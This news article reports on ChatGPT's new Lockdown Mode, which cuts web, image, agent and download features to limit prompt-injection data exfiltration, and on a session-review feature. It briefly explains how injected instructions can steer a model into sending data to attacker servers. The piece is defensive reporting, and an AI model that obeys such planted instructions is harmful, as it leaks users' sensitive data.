OpenAI has introduced a new Lockdown Mode for ChatGPT, aimed at users handling sensitive data who require enhanced security measures. This feature is available to logged-in users across Free, Go, Plus, Pro, and self-serve ChatGPT Business plans.
According to OpenAI, Lockdown Mode is an optional advanced security setting that limits many tools and capabilities in OpenAI products that can connect to the web or external services. It is designed to reduce the risk of data exfiltration from prompt injection attacks by limiting outbound network requests, at the expense of disabling or limiting some useful features.
Prompt injection attacks involve embedding malicious instructions within user inputs to manipulate the model’s behavior, potentially leading to unauthorized data access or exfiltration. Lockdown Mode addresses this by restricting outbound network requests that could transmit sensitive information to attacker-controlled servers.
Enabling Lockdown Mode disables several features, including:
- Live web browsing, limiting access to cached content only.
- Image support, preventing the display or retrieval of images from the web.
- Deep research capabilities.
- Agent mode.
- Canvas networking, blocking network access for code generated by Canvas.
- File downloads for data analysis.
OpenAI emphasizes that Lockdown Mode is not intended for all users and cannot be used simultaneously with Developer Mode; activating one will disable the other. While this feature significantly reduces the risk of prompt injection-based data exfiltration, it does not eliminate all potential threats. For instance, malicious instructions hidden in uploaded files could still affect ChatGPT’s behavior and lead to incorrect responses.
In addition to Lockdown Mode, OpenAI has launched a new account management feature that allows users to review active ChatGPT sessions and log out of individual or all sessions if unauthorized activity is detected. This feature provides details such as device information, app used, approximate location, sign-in date and time, device trust status, and current session status.
As reported by The Hacker News, these developments underscore OpenAI’s commitment to enhancing user security and privacy. However, users should remain vigilant and implement comprehensive security practices, as no single feature can fully eliminate all potential risks associated with prompt injection attacks.
Source: The Hacker News
